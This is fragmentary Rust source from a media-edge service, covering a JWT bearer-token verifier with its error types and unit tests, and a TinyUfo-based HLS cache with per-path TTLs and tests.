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part-293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apps/aiyou_stack/aiyou-fastapi-services/judge6/skills/governance_base.py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Governance Skill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Adapted from K-Dense-AI/claude-scientific-skills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defines the schema and base class for "Governance Skills".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skill represents a specific check (e.g., FedRAMP compliance, Cost Audit).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GovernanceSkill(BaseModel):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= "Judge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governance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 be implemented by subclasses.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NotImplementedError("Skill must implement execute()")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FedRAMPComplianceSkill(GovernanceSkill):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"fedramp-compliance-check"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"Checks if the resource configuration meets FedRAMP High standards."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["security", "compliance", "fedramp"]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 = context.get("resource",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Check: Public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resource.get("iam_policy", {}).get("allUsers"):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violations.append("Public access (allUsers) is PROHIBITED for FedRAMP High.")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Check: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resource.get("encryption", {}).get("cmek"):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violations.append("Customer Managed Encryption Keys (CMEK) required.")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len(violations)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context.get("timestamp"),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CostAuditSkill(GovernanceSkill):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"cost-audit-check"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"Checks if the resource usage is within budget thresholds."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["finance", "cost", "audit"]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context.get("cost",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 = context.get("budget",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cost &lt;= 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"utilization": cost / budget if budget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"alert": cost &gt; (budget * 0.9),  # Alert at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apps/aiyou_stack/aiyou-fastapi-services/judge6/skills/governance_base.py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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/00-namespaces.yaml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GKE Inference - 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4-layer isolation: Governance, Orchestration, Inference,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security.istio.io/tlsMode: istio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"Judge 6 governance layer - ATP 5-19 compliance enforcement"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cognitive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security.istio.io/tlsMode: istio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"AutoGen cognitive orchestration - multi-agent workflows"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security.istio.io/tlsMode: istio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"LLM inference layer - vLLM, GKE Inference Gateway, model serving"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shadowtag-audit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security.istio.io/tlsMode: istio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"ShadowTag cryptographic audit trail - C2PA + DCT watermarking"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"Monitoring stack - Prometheus, Grafana, alerting"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Network Policies for namespace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deny-all-ingress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allow-governance-ingress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deny-all-ingress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allow-orchestration-ingress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deny-all-ingress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allow-inference-ingress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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/00-namespaces.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/01-resource-quotas.yaml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Resource Quotas and Limits for Cost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Monthly budget: $65K → enforce resource limits per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 Namespace (Judge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ResourceQuota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governance-quota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requests.cpu: "32"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requests.memory: "128Gi"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limits.cpu: "64"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limits.memory: "256Gi"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persistentvolumeclaims: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requests.storage: "500Gi"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 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LimitRange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governance-limits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Orchestration Namespace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ResourceQuota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orchestration-quota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requests.cpu: "64"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requests.memory: "256Gi"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limits.cpu: "128"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limits.memory: "512Gi"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persistentvolumeclaims: "20"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requests.storage: "1Ti"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LimitRange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orchestration-limits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"64Gi"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Inference Namespace (LLM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ResourceQuota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inference-quota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requests.cpu: "128"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requests.memory: "512Gi"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limits.cpu: "256"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limits.memory: "1Ti"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requests.nvidia.com/gpu: "20"  # 20x L4 GPUs (10 nodes × 2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persistentvolumeclaims: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requests.storage: "2Ti"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 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LimitRange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inference-limits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"96Gi"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nvidia.com/gpu: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Namespace (Audit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ResourceQuota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requests.cpu: "16"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requests.memory: "64Gi"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limits.cpu: "32"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limits.memory: "128Gi"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persistentvolumeclaims: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requests.storage: "500Gi"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LimitRange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ResourceQuota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monitoring-quota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requests.cpu: "16"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requests.memory: "64Gi"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limits.cpu: "32"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limits.memory: "128Gi"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persistentvolumeclaims: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requests.storage: "200Gi"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 "20"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LimitRange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monitoring-limits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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/01-resource-quotas.yaml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cloud.google.com/v1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BackendConfig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shadowtagai-backend-config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Health check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Connection draining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Session affinity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affinityType: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"shadowtagai-security-policy"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Cloud CDN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includeHost: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includeProtocol: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includeQueryString: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IAP (Identity-Aware Proxy) -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oauthclientCredentials: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secretName: shadowtagai-iap-secret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Vertex AI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CLOUD_ML_REGION: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Application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NODE_ENV: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Business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MIN_LTV_CAC_RATIO: "4.0"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MIN_ROI_THRESHOLD: "3.0"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MIN_CONFIDENCE: "0.70"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MODE_THINK: "strategic_reasoning"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MODE_BUILD: "implementation"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MODE_SCALE: "growth_acceleration"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Use Spot VMs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Tolerate preemption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cloud.google.com/gke-spot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seccompProfile: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RuntimeDefault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us-central1-docker.pkg.dev/PROJECT_ID/shadowtagai/orchestrator:latest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CLOUD_ML_REGION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CLOUD_ML_REGION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NODE_ENV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NODE_ENV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MIN_LTV_CAC_RATIO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MIN_LTV_CAC_RATIO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MIN_ROI_THRESHOLD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MIN_ROI_THRESHOLD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Secret (created via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ANTHROPIC_VERTEX_PROJECT_ID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Liveness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Startup probe (for slow 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startupProbe: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Volume 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/app/.cache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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/gemini-ingestion-layer.yaml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- Nightly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CronJob Multi-Container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Runtime Target: ~45 min/night | Cost: ~$77/month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data-collection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"intelligence-pipeline"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Runtime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TARGET_RUNTIME_MINUTES: "45"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EXECUTION_SCHEDULE: "0 2 * * *"  # 2 AM daily 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MIN_ITEMS_PER_DAY: "500"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MIN_SOURCE_DIVERSITY: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MAX_COST_PER_ITEM: "0.15"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MIN_QUALITY_SCORE: "0.70"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Ethical Compliance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RESPECT_ROBOTS_TXT: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RATE_LIMIT_REQUESTS_PER_MIN: "60"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USER_AGENT: "PNKLN-Ingestion-Bot/1.0 (+https://pnkln.ai/bot)"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CRAWL_DELAY_SECONDS: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MAX_CONCURRENT_REQUESTS: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tier1:  # High-value, primary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youtube-api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quota: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news-aggregator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quota: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tier2:  # Secondary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twitter-api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quota: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reddit-api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quota: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tier3:  # Supplementary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rss-feeds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quota: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priority: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web-crawler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quota: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priority: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Tier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tier_classification.yaml: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verified_source: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recency_hours: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engagement_score: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relevance_score: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verified_source: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recency_hours: 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engagement_score: "&gt;= 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relevance_score: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recency_hours: 168  #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engagement_score: "&gt;=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relevance_score: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robots-txt-config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Cached robots.txt directives from common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robots_cache.json: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"cache_ttl_hours":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"directives":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api-credentials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YOUTUBE_API_KEY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TWITTER_BEARER_TOKEN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REDDIT_CLIENT_ID: "placeholder-replace-in-production"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REDDIT_CLIENT_SECRET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NEWS_API_KEY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gemini-ingestion-nightly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data-collection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Schedule: 2 AM UTC daily (adjust for your timezone)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Concurrency policy: Don't run if previous job still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concurrencyPolicy: Forbid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Keep last 3 successful and 1 failed job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Timeout: 60 minutes (allows buffer beyond 45-min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activeDeadlineSeconds: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data-collection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Retry failed jobs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data-collection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cost-category: "intelligence-collection"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estimated-monthly-cost: "77"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gemini-ingestion-sa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Node selection: CPU-optimized for web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workload: llm-routing  # Reuse CPU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Init container: Validate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config-validator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gcr.io/pnkln-core-stack/ingestion-validator:latest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echo "Validating ingestion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python3 /app/validate_config.py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echo "Configuration valid. Starting ingestion pipeline."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CONFIG_PATH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/config/sources.yaml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Multi-container pod: Each source gets its own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Container 1: YouTube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youtube-collector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gcr.io/pnkln-core-stack/youtube-ingestion:latest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QUOTA_LIMIT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"10000"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RESPECT_ROBOTS_TXT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RESPECT_ROBOTS_TXT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RATE_LIMIT_RPM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RATE_LIMIT_REQUESTS_PER_MIN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robots-cache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Container 2: Twitter/X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twitter-collector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gcr.io/pnkln-core-stack/twitter-ingestion:latest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TWITTER_BEARER_TOKEN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TWITTER_BEARER_TOKEN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QUOTA_LIMIT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"3000"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RATE_LIMIT_RPM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RATE_LIMIT_REQUESTS_PER_MIN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Container 3: News Aggregator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news-collector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gcr.io/pnkln-core-stack/news-ingestion:latest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NEWS_API_KEY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NEWS_API_KEY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QUOTA_LIMIT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"5000"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CRAWL_DELAY_SECONDS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CRAWL_DELAY_SECONDS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robots-cache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Container 4: Reddit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reddit-collector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gcr.io/pnkln-core-stack/reddit-ingestion:latest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REDDIT_CLIENT_ID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REDDIT_CLIENT_ID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REDDIT_CLIENT_SECRET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REDDIT_CLIENT_SECRET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QUOTA_LIMIT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"2000"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RATE_LIMIT_RPM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RATE_LIMIT_REQUESTS_PER_MIN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Container 5: Web Crawler (RSS + Generic)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web-crawler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gcr.io/pnkln-core-stack/web-crawler:latest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RESPECT_ROBOTS_TXT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CRAWL_DELAY_SECONDS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CRAWL_DELAY_SECONDS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MAX_CONCURRENT_REQUESTS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MAX_CONCURRENT_REQUESTS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robots-cache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Container 6: Gemini Classifier &amp; Tier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gemini-classifier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gcr.io/pnkln-core-stack/gemini-classifier:latest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MODEL_ID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MIN_QUALITY_SCORE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MIN_QUALITY_SCORE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VERTEX_AI_PROJECT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"pnkln-core-stack"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VERTEX_AI_LOCATION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Container 7: Quality Gate Enforcer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quality-gate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gcr.io/pnkln-core-stack/quality-gate:latest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MIN_ITEMS_PER_DAY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MIN_ITEMS_PER_DAY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MIN_SOURCE_DIVERSITY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MIN_SOURCE_DIVERSITY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MAX_COST_PER_ITEM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MAX_COST_PER_ITEM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TARGET_RUNTIME_MINUTES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TARGET_RUNTIME_MINUTES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Container 8: AM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briefing-generator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gcr.io/pnkln-core-stack/briefing-generator:latest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MODEL_ID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OUTPUT_FORMAT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DELIVERY_ENDPOINT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"http://llm-prefill-service.cognitive-stack-v5:8000/v1/briefing"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Shared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robots-cache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robots-txt-config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sizeLimit: 10Gi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sizeLimit: 1Gi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claimName: briefings-pvc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briefings-pvc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ReadWriteMany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standard-rwo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50Gi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RBAC: Allow ingestion to call services in other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ClusterRole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ingestion-cross-namespace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["services"]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["pods"]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["configmaps"]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ClusterRoleBinding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ingestion-cross-namespace-binding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ClusterRole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ingestion-cross-namespace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apiGroup: rbac.authorization.k8s.io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Monitoring: PrometheusRule for ingestion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monitoring.coreos.com/v1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PrometheusRule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ingestion-quality-gates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LowDailyItemCount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ingestion_items_collected_total &lt;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"Daily item count below minimum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"Collected {{ $value }} items (target: ≥500)"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LowSourceDiversity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ingestion_active_sources_count &lt;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"Source diversity below minimum"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"Only {{ $value }} sources active (target: ≥5)"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HighCostPerItem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ingestion_cost_per_item_usd &gt;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"Cost per item exceeding budget"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"Cost: ${{ $value }} per item (target: ≤$0.15)"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LowQualityScore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avg(ingestion_item_quality_score) &lt;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"Average quality score below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"Quality score: {{ $value }} (target: ≥0.70)"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RuntimeExceeded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ingestion_runtime_minutes &gt;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"Ingestion runtime exceeding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"Runtime: {{ $value }} minutes (target: ≤45 min)"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EthicalComplianceViolation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ingestion_robots_txt_violations_total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"robots.txt violations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"{{ $value }} violations in this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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/gemini-ingestion-layer.yaml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Horizontal Pod Autoscaling with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Leverages GKE Inference Gateway metrics for intelligent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Metrics Adapter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adapter-config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seriesQuery: 'vllm:num_requests_running'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template: &lt;&lt;.Resource&gt;&gt;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matches: "^(.*)"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as: "pending_request_count"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metricsQuery: 'avg_over_time(vllm:num_requests_running[1m])'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seriesQuery: 'vllm:gpu_cache_usage_perc'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template: &lt;&lt;.Resource&gt;&gt;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matches: "^(.*)"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as: "kv_cache_usage_percent"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metricsQuery: 'avg_over_time(vllm:gpu_cache_usage_perc[1m])'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seriesQuery: 'vllm:request_success_total'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template: &lt;&lt;.Resource&gt;&gt;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matches: "^(.*)"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as: "requests_per_second"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metricsQuery: 'rate(vllm:request_success_total[1m])'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seriesQuery: 'vllm:e2e_request_latency_seconds'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template: &lt;&lt;.Resource&gt;&gt;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matches: "^(.*)"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as: "p99_latency_ms"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metricsQuery: 'histogram_quantile(0.99, rate(vllm:e2e_request_latency_seconds_bucket[5m])) * 1000'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HPA for LLM Prefill (parallel processing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llm-prefill-hpa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llm-prefill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Scale based on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DCGM_FI_DEV_GPU_UTIL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"70"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Scale based on KV cache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kv_cache_usage_percent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Scale based on pending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pending_request_count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CPU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Memory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  # Scale up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  # Double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4  # Or add 4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  # Wait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  # Reduce by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HPA for LLM Decode (generation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llm-decode-hpa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llm-decode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Scale based on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DCGM_FI_DEV_GPU_UTIL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Scale based on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requests_per_second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Scale based on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p99_latency_ms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"70"  # Scale before hitting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KV cache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kv_cache_usage_percent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"85"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CPU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HPA for Judge 6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judge6-hybrid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P99 latency (most important for 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p99_latency_ms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"70"  # Scale before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DCGM_FI_DEV_GPU_UTIL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"65"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Coverage rate (custom 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coverage_rate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"0.98"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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/inference-gateway.yaml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Inference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Provides intelligent, model-aware load balancing with KV cache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gateway.networking.k8s.io/v1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llm-inference-gateway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networking.gke.io/enable-inference-gateway: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networking.gke.io/inference-gateway-type: "llm"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gatewayClassName: gke-l7-global-inference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allowedRoutes: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from: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allowedRoutes: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from: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mode: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certificateRefs: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inference-gateway-cert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gateway.networking.k8s.io/v1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HTTPRoute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llm-router-route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Enable prefix-aware load balancing for 96% TTFT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networking.gke.io/prefix-aware-load-balancing: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llm-inference-gateway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Route to prefill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PathPrefix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/v1/completions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PathPrefix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/v1/chat/completions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llm-prefill-service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Route to decode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PathPrefix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/v1/generate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llm-decode-service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Health check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llm-prefill-service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BackendPolicy for advanced load balancing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networking.gke.io/v1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GCPBackendPolicy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llm-backend-policy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GENERATED_COOKIE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cookieTtl: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300  # 5 minutes for long-running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group: gateway.networking.k8s.io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llm-inference-gateway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networking.gke.io/v1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HealthCheckPolicy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llm-health-check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llm-prefill-service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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/inference-gateway.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/ingress.yaml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GCE ingress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kubernetes.io/ingress.class: "gce"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SSL redirect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kubernetes.io/ingress.allow-http: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Global static IP (create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kubernetes.io/ingress.global-static-ip-name: "shadowtagai-orchestrator-ip"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Managed certificate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networking.gke.io/managed-certificates: "shadowtagai-cert"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Backend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"shadowtagai-backend-config"}'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NEG (Network Endpoint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host: api.shadowtagai.io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pathType: ImplementationSpecific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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/ingress.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/kustomization.yaml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kustomize.config.k8s.io/v1beta1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Kustomization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pdb.yaml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networkpolicy.yaml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backendconfig.yaml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managedcertificate.yaml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managed-by: kustomize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us-central1-docker.pkg.dev/PROJECT_ID/shadowtagai/orchestrator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newTag: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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/kustomization.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/llm-disaggregated-serving.yaml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Disaggregated LLM Serving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Separates prefill (parallel processing) and decode (generation)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Achieves 60% throughput improvement per Google's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llm-vllm-config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Common vLLM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MODEL_NAME: "meta-llama/Meta-Llama-3-8B-Instruct"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TENSOR_PARALLEL_SIZE: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MAX_MODEL_LEN: "8192"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GPU_MEMORY_UTILIZATION: "0.95"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ENABLE_PREFIX_CACHING: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ENABLE_CHUNKED_PREFILL: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KV_CACHE_DTYPE: "fp8"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QUANTIZATION: "awq"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TRUST_REMOTE_CODE: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Prefill Deployment - Optimized for parallel token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llm-prefill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llm-prefill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cloud.google.com/compute-class: gpu-l4-spot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workload: llm-prefill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vllm-prefill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vllm/vllm-openai:v0.8.0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llm-vllm-config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TENSOR_PARALLEL_SIZE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llm-vllm-config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TENSOR_PARALLEL_SIZE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VLLM_DISAGGREGATED_SERVING_MODE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"prefill"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MAX_NUM_BATCHED_TOKENS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"16384"  # Large batch for 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MAX_NUM_SEQS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CUDA_VISIBLE_DEVICES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"0,1"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VLLM_ATTENTION_BACKEND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"FLASHINFER"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--model=$(MODEL_NAME)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--served-model-name=pnkln-hybrid-model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--tensor-parallel-size=$(TENSOR_PARALLEL_SIZE)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--max-model-len=8192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--gpu-memory-utilization=0.95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--enable-prefix-caching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--enable-chunked-prefill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--kv-cache-dtype=fp8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--quantization=awq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--trust-remote-code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--disable-log-requests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/dev/shm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/root/.cache/huggingface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medium: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sizeLimit: 16Gi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driver: gcsfuse.csi.storage.gke.io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bucketName: pnkln-core-stack-model-weights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mountOptions: "implicit-dirs,file-mode=644,dir-mode=755"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Decode Deployment - Optimized for token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llm-decode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llm-decode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cloud.google.com/compute-class: gpu-l4-spot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workload: llm-decode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vllm-decode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vllm/vllm-openai:v0.8.0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llm-vllm-config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VLLM_DISAGGREGATED_SERVING_MODE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"decode"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MAX_NUM_BATCHED_TOKENS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"4096"  # Smaller batch for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MAX_NUM_SEQS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"512"  # More sequences for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CUDA_VISIBLE_DEVICES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VLLM_ATTENTION_BACKEND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"FLASHINFER"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--model=$(MODEL_NAME)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--served-model-name=pnkln-hybrid-model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--tensor-parallel-size=1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--max-model-len=8192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--gpu-memory-utilization=0.95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--enable-prefix-caching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--kv-cache-dtype=fp8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--quantization=awq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--trust-remote-code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--disable-log-requests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/dev/shm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/root/.cache/huggingface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medium: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sizeLimit: 8Gi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driver: gcsfuse.csi.storage.gke.io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bucketName: pnkln-core-stack-model-weights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mountOptions: "implicit-dirs,file-mode=644,dir-mode=755"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Prefill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llm-prefill-service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"llm-backend-config"}'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Decode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llm-decode-service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"llm-backend-config"}'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 with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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/llm-disaggregated-serving.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/managedcertificate.yaml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networking.gke.io/v1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ManagedCertificate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api.shadowtagai.io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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/managedcertificate.yaml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core-stack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pnkln-monitoring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pnkln-workload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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/namespaces.yaml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 - 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4-tier namespace design for workload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compliance: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"llm-routing"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"watermarking"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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/namespaces.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/networkpolicy.yaml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Ingress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from ingress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ingress-nginx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from Prometheus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Egress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DNS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kube-system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UDP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HTTPS to Vertex AI and GCP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HTTP (for Vertex AI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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/networkpolicy.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/pdb.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/pdb.yaml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"shadowtagai-backend-config"}'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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/serviceaccount.yaml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with your GCP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shadowtagai-orchestrator@YOUR_PROJECT_ID.iam.gserviceaccount.com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apps/aiyou_stack/aiyou-fastapi-services/k8s/base/serviceaccount.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/deployments/judge6-core.yaml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terminationGracePeriodSeconds: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judge6-engine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us-docker.pkg.dev/cloudrun/container/hello # Placeholder until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"PRECISION_PERSISTENCE_PROFIT"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apps/aiyou_stack/aiyou-fastapi-services/k8s/deployments/judge6-core.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/inference-gateway/vllm-deployment.yaml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vLLM Deployment for Local LLM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Model: Llama 3.1 70B on NVIDIA L4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5% of inference requests (failover, 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vllm-config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"model": "meta-llama/Meta-Llama-3.1-70B-Instruct",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"tensor_parallel_size":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"max_model_len":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"gpu_memory_utilization":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"enforce_eager":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"enable_prefix_caching":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"disable_log_stats":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"dtype": "half",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"quantization":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vllm-sa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"vllm@${PROJECT_ID}.iam.gserviceaccount.com"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vllm-llama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llama-3.1-70b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Recreate  # GPU resources can't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llama-3.1-70b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llama-3.1-70b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vllm-sa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Node affinity for L4 GPU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nodeSelectorTerms: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inference-l4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gpu_type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nvidia-l4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"Equal"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"NoSchedule"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gcr.io/google.com/cloudsdktool/cloud-sdk:alpine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"Downloading Llama 3.1 70B from Hugging Face Hub..."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In production, use GCS mirror for faster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gsutil -m rsync -r gs://${PROJECT_ID}-models/llama-3.1-70b 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"Model download complete (placeholder - implement actual download)"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vllm-server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vllm/vllm-openai:latest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vllm.entrypoints.openai.api_server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meta-llama/Meta-Llama-3.1-70B-Instruct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--tensor-parallel-size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--max-model-len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"8192"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--gpu-memory-utilization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"0.9"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--enable-prefix-caching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HUGGING_FACE_HUB_TOKEN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llm-router-secrets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HF_TOKEN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CUDA_VISIBLE_DEVICES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"0,1"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NCCL_DEBUG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"64Gi"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"96Gi"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300  # Model loading takes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/root/.cache/huggingface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/dev/shm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sizeLimit: 200Gi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medium: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sizeLimit: 32Gi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vllm-service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llama-3.1-70b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llama-3.1-70b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Inference Gateway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gateway.networking.k8s.io/v1beta1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inference-gateway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networking.gke.io/enable-inference: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networking.gke.io/inference-backend-config: "inference-backend-config"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gatewayClassName: gke-l7-gxlb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mode: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certificateRefs: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inference-tls-cert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gateway.networking.k8s.io/v1beta1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HTTPRoute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llm-router-route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inference-gateway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PathPrefix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/v1/chat/completions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vllm-service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PathPrefix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/v1/completions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vllm-service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cloud.google.com/v1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BackendConfig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inference-backend-config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customRequestHeaders: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"X-Inference-Gateway: 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"X-Trace-Id: {client_trace_id}"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KV-cache aware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affinityType: "CLIENT_IP"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affinityCookieTtlSec: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includeHost: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includeProtocol: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includeQueryString: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sampleRate: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apps/aiyou_stack/aiyou-fastapi-services/k8s/inference-gateway/vllm-deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/admission-webhook.yaml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Admission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Enforces governance policies at Kubernetes admission control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98% coverage of all inference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judge-webhook-sa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ClusterRole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judge-webhook-role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["pods"]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"list", "watch"]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["apps"]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["deployments", "replicasets"]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"list", "watch"]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["admissionregistration.k8s.io"]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["validatingwebhookconfigurations", "mutatingwebhookconfigurations"]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"list", "watch", "create", "update", "patch"]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ClusterRoleBinding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judge-webhook-rolebinding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apiGroup: rbac.authorization.k8s.io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ClusterRole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judge-webhook-role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judge-webhook-sa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judge-webhook-config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Webhook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cert_path: "/etc/webhook/certs/tls.crt"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key_path: "/etc/webhook/certs/tls.key"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routing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Route 90% to Layer 1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layer1_probability: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Escalation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escalate_to_layer2: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condition: "latency_p99 &gt; 30ms"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condition: "confidence &lt; 0.85"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condition: "contains(policy_id, 'atp-5-19')"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escalate_to_layer3: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condition: "risk_score &gt; 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condition: "regulatory_intersection ==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condition: "critical_violation ==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Coverage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target_coverage: 0.98  # 98% of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Namespaces to enforce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included_namespaces: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"autogen-orchestration"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"llm-inference"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"shadowtag-audit"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Excluded namespaces (system)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excluded_namespaces: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"kube-system"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"kube-public"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Enforcement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mode: "enforce"  # enforce | audit |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Failure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failure_policy: "Fail"  # Fail |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log_format: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audit_trail_path: "/var/log/judge/audit.log"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judge-webhook-sa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nodeSelectorTerms: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"Equal"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"NoSchedule"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gcr.io/${PROJECT_ID}/judge-webhook:latest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JUDGE_LAYER1_ENDPOINT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"http://judge-layer1.ShadowTag-v2jr-governance.svc.cluster.local:8080"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JUDGE_LAYER2_ENDPOINT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"http://judge-layer2.ShadowTag-v2jr-governance.svc.cluster.local:8080"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JUDGE_LAYER3_ENDPOINT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"http://judge-layer3.ShadowTag-v2jr-governance.svc.cluster.local:8080"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TARGET_COVERAGE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"0.98"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scheme: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scheme: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webhook-certs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/etc/webhook/certs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/etc/webhook/config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audit-logs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/var/log/judge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webhook-certs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secretName: judge-webhook-certs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judge-webhook-config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audit-logs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admissionregistration.k8s.io/v1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ValidatingWebhookConfiguration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judge.ShadowTag-v2jr-governance.svc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admissionReviewVersions: ["v1"]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"/validate"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caBundle: ${CA_BUNDLE}  # Must be replaced with actual CA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operations: ["CREATE", "UPDATE"]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apiVersions: ["v1"]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resources: ["pods"]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scope: "Namespaced"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operations: ["CREATE", "UPDATE"]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apiGroups: ["apps"]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apiVersions: ["v1"]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resources: ["deployments", "replicasets"]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scope: "Namespaced"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key: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shadowtag-audit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failurePolicy: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sideEffects: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judge-webhook-pdb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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/admission-webhook.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/layer1-gemini-deployment.yaml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Layer 1: Gemini Fast Policy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p99 &lt;30ms via Vertex AI Gemini 1.5 Pro (tuned on PRB corpus)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Allocation: 40% of inference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judge-layer1-config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"gemini-3.1-flash-lite-preview-tuned-prb"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"us-central1-aiplatform.googleapis.com"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"${PROJECT_ID}"  # Replace with actual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p99_latency_ms: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target_qps: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timeout_ms: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Policy ruleset (PRB-derived)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"atp-5-19-export-control"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"Export control compliance (ITAR, EAR)"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"atp-5-19-dual-use"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"Dual-use technology screening"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"pii-gdpr-ccpa"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"PII handling (GDPR, CCPA)"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"content-safety"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"Content safety (violence, hate speech)"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"ip-protection"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"Intellectual property protection"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Layer 2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condition: "latency_p99 &gt; 30ms"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"escalate_to_layer2"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condition: "confidence &lt; 0.85"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"escalate_to_layer2"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condition: "policy_id == 'atp-5-19-*'"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"parallel_layer2_validation"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judge-layer1-sa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"judge-layer1@${PROJECT_ID}.iam.gserviceaccount.com"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judge-layer1-gemini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judge-layer1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judge-layer1-sa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Node affinity for governance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nodeSelectorTerms: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judge-layer1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"Equal"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"NoSchedule"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gcr.io/${PROJECT_ID}/judge-gemini:latest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"gemini-3.1-flash-lite-preview-tuned-prb"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fieldPath: metadata.namespace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GOOGLE_APPLICATION_CREDENTIALS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"/var/secrets/google/key.json"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P99_LATENCY_TARGET_MS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google-cloud-key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/var/secrets/google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judge-layer1-config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google-cloud-key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secretName: judge-layer1-gcp-key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judge-layer1-hpa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judge-layer1-gemini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http_requests_per_second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judge-layer1-pdb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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/layer1-gemini-deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/layer2-pytorch-deployment.yaml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Layer 2: PyTorch Fine-Tuned Policy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p99 &lt;40ms via Vertex AI custom-trained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Allocation: 35% of inference requests (escalated from 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case: Complex ATP 5-19 compliance, multi-policy intersection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judge-layer2-config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"prb-policy-validator-pytorch-v2"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model_path: "gs://${PROJECT_ID}-models/judge-layer2/model.pt"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checkpoint_path: "gs://${PROJECT_ID}-models/judge-layer2/checkpoints"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architecture: "transformers"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base_model: "google/flan-t5-xxl"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fine_tuned_on: "prb-policy-corpus"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quantization: "int8"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batch_size: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max_sequence_length: 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p99_latency_ms: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target_qps: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timeout_ms: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Advanced policy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"atp-5-19-composite"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"Multi-factor ATP 5-19 compliance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requires_context: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"regulatory-intersection"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"GDPR + CCPA + EU AI Act intersection"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"export-control-advanced"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"ITAR + EAR + Wassenaar Arrangement"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"risk-scoring"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"ATP 5-19 risk scoring (0-100)"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output_format: "risk_score"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Layer 3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condition: "latency_p99 &gt; 40ms"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"escalate_to_layer3"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condition: "risk_score &gt; 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"parallel_layer3_validation"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condition: "regulatory_intersection ==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"escalate_to_layer3"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judge-layer2-sa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"judge-layer2@${PROJECT_ID}.iam.gserviceaccount.com"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judge-layer2-pytorch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judge-layer2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judge-layer2-sa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Node affinity for governance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nodeSelectorTerms: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judge-layer2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"Equal"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"NoSchedule"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gcr.io/google.com/cloudsdktool/cloud-sdk:alpine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"Downloading PyTorch model from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gsutil -m rsync -r gs://${PROJECT_ID}-models/judge-layer2 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"Model download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judge-pytorch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gcr.io/${PROJECT_ID}/judge-pytorch:latest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"/models/model.pt"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CHECKPOINT_PATH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"/models/checkpoints"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P99_LATENCY_TARGET_MS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"40"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"int8"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google-cloud-key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/var/secrets/google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judge-layer2-config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sizeLimit: 50Gi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google-cloud-key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secretName: judge-layer2-gcp-key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judge-layer2-hpa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judge-layer2-pytorch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judge-layer2-pdb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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/layer2-pytorch-deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/k8s/judge-6/layer3-rules-deployment.yaml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Layer 3: Rules Engine (Deterministic Policy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p99 &lt;20ms via Rego/OPA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Allocation: 15% of inference requests (escalated from Layer 2, high-risk)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case: Final arbiter for ATP 5-19 critical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judge-layer3-config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engine: "opa"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"0.60.0"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p99_latency_ms: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target_qps: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timeout_ms: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Policy bundle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service: "gcs"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 "gs://${PROJECT_ID}-opa-policies/bundle.tar.gz"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min_delay_seconds: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max_delay_seconds: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OPA Policy: ATP 5-19 Export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atp-5-19-export-control.rego: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 atp_5_19_export_control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future.keywords.if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future.keywords.in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ITAR-controlled items (simplified - expand from actual USML)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itar_controlled :=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"defense_articles",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"military_technology",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"spacecraft",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"night_vision",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"encryption_over_56bit"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EAR-controlled dual-use items (simplified - expand from actual CCL)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ear_controlled :=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"advanced_computing",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"encryption",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"telecommunications",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"sensors",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"navigation"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Embargoed countries (D:1 countries)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embargoed_countries :=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"CU", "IR", "KP", "SY", "RU", "BY"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Violation: ITAR export to unauthorized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deny[msg]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input.request.content contains itar_controlled[_]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input.request.authorized_itar_entity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 := "CRITICAL: ITAR-controlled content requires authorized entity"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Violation: Export to embargoed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deny[msg]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input.request.destination_country in embargoed_countries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 := sprintf("CRITICAL: Export to embargoed country: %v", [input.request.destination_country])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Violation: Encryption &gt;56-bit without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deny[msg]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input.request.encryption_strength &gt; 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input.request.encryption_license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 := "HIGH: Encryption &gt;56-bit requires export license (EAR 740.17)"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scoring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 := score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violations := count(deny)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itar_match := count([x | x := input.request.content; x in itar_controlled])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ear_match := count([x | x := input.request.content; x in ear_controlled])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base_score := violations *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content_score := (itar_match * 20) + (ear_match *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:= min([100, base_score + content_score])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count(deny)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risk_score &lt;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OPA Policy: PII Protection (GDPR + CCPA)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pii-protection.rego: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 pii_protection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future.keywords.if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future.keywords.in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PII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pii_patterns :=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"ssn": "\\b\\d{3}-\\d{2}-\\d{4}\\b",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"email": "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}",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"phone": "\\b\\d{3}[-.]?\\d{3}[-.]?\\d{4}\\b",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"credit_card": "\\b\\d{4}[\\s-]?\\d{4}[\\s-]?\\d{4}[\\s-]?\\d{4}\\b"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Violation: PII without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deny[msg]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input.request.contains_pii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input.request.user_consent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 := "HIGH: PII processing requires user consent (GDPR Art. 6)"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Violation: Data retention beyond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deny[msg]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input.request.retention_days &gt; 365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input.request.retention_justification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 := "MEDIUM: Data retention &gt;365 days requires justification (GDPR Art. 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Violation: Cross-border transfer without adequacy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deny[msg]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input.request.cross_border_transfer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input.request.adequacy_decision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input.request.standard_contractual_clauses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 := "HIGH: Cross-border PII transfer requires adequacy decision (GDPR Art. 45)"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count(deny)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OPA Policy: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content-safety.rego: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 content_safety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future.keywords.if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Prohibited content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 